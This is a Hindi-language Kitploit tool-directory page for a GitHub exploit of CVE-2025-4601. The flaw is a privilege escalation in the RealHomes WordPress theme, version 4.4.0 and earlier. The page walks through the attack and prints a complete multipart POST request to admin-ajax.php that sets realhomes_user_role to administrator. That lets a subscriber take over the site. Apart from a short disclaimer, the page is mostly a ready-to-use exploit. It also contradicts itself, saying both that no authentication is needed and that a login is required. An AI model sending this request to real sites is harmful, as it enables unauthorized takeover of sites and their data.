Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-4601 — RH - Real Estate WordPress Theme <= 4.4.0 - प्रमाणीकृत (Subscriber+) विशेषाधिकार वृद्धि | Kitploit
उपकरण/GitHubGitHub/yucaerin/cve-2025-4601
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubyucaerin/cve-2025-4601

CVE-2025-4601

RH - Real Estate WordPress Theme <= 4.4.0 - प्रमाणीकृत (Subscriber+) विशेषाधिकार वृद्धि

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-4601 - वर्डप्रेस RealHomes थीम <= 4.4.0 - विशेषाधिकार वृद्धि

🔥 कमजोरी का सारांश वर्डप्रेस थीम RealHomes के संस्करण <= 4.4.0 में विशेषाधिकार वृद्धि की कमजोरी है। यह प्रमाणित उपयोगकर्ताओं को कम विशेषाधिकारों (जैसे सब्सक्राइबर) के साथ अपनी भूमिका को प्रशासकों तक बढ़ाने की अनुमति देता है। यह कमजोरी inspiry_update_profile फ़ंक्शन के माध्यम से होती है, जो अनुचित रूप से उपयोगकर्ताओं को अपनी भूमिका बदलने की अनुमति देता है यदि ere_allow_users_change_role विकल्प सक्षम है।

इस समस्या का शोषण करने के लिए admin-ajax.php एंडपॉइंट पर एक विशेष रूप से तैयार POST अनुरोध भेजा जा सकता है, जिसमें realhomes_user_role पैरामीटर को administrator पर सेट किया जाता है।

🔍 प्रभावित थीम

  • थीम का नाम: RealHomes
  • प्रभावित संस्करण: <= 4.4.0
  • कमजोरी का प्रकार: विशेषाधिकार वृद्धि
  • CVE ID: CVE-2025-4601
  • CVSS स्कोर: 8.8 (गंभीर)
  • प्रभाव: पूर्ण प्रशासनिक पहुंच → संभावित साइट समझौता

🧪 शोषण सुविधाएँ

  • 📥 nonce को स्वचालित रूप से लक्ष्य पृष्ठ से प्राप्त करता है।
  • 🔐 उपयोगकर्ता की भूमिका को realhomes_user_role पैरामीटर के माध्यम से administrator तक बढ़ाता है।
  • 🌐 प्रमाणीकरण की आवश्यकता नहीं है, केवल कम-विशेषाधिकार वाले उपयोगकर्ता (जैसे, सब्सक्राइबर) के रूप में लॉग इन होना आवश्यक है।
  • 💾 उपयोगकर्ता प्रोफ़ाइल अपडेट करता है, हमलावर को प्रशासनिक पहुंच प्रदान करता है।

🧠 शोधकर्ता

  • श्रेय: Thai An

🚀 उपयोग

  1. लक्ष्य वेबसाइट पर लॉगिन करें एक कम-विशेषाधिकार वाले उपयोगकर्ता के रूप में (जैसे, सब्सक्राइबर)।

  2. /wp-admin/admin-ajax.php एंडपॉइंट तक निम्नलिखित POST डेटा के साथ पहुंचें, जिसमें realhomes_user_role को administrator पर सेट किया गया है:

    root@kitploit:~
    POST /wp-admin/admin-ajax.php HTTP/2
    Host: targetsite.com
    Cookie: wordpress_logged_in_xxx=...
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNGw1yuikHiYVYYsr
    
    ------WebKitFormBoundaryNGw1yuikHiYVYYsr
    Content-Disposition: form-data; name="first-name"
    test
    ------WebKitFormBoundaryNGw1yuikHiYVYYsr
    Content-Disposition: form-data; name="last-name"
    user
    ------WebKitFormBoundaryNGw1yuikHiYVYYsr
    Content-Disposition: form-data; name="realhomes_user_role"
    administrator
    ------WebKitFormBoundaryNGw1yuikHiYVYYsr
    Content-Disposition: form-data; name="action"
    inspiry_update_profile
    ------WebKitFormBoundaryNGw1yuikHiYVYYsr--
    
  3. प्रतिक्रिया जांचें: यदि अनुरोध सफल होता है, तो हमलावर को प्रशासनिक पहुंच प्राप्त हो जाएगी।

  4. /wp-admin/ पृष्ठ तक पहुंच कर सत्यापित करें कि हमलावर को प्रशासक विशेषाधिकार प्रदान किए गए हैं या नहीं।

🔒 अस्वीकरण: यह केवल शैक्षिक उद्देश्यों के लिए है और केवल उन सिस्टमों पर उपयोग किया जाना चाहिए जिनके आप स्वामी हैं या जिनका परीक्षण करने के लिए आपको स्पष्ट रूप से अधिकृत किया गया है। इस कोड का दुरुपयोग कानूनी परिणामों का कारण बन सकता है।

टूल डाउनलोड करें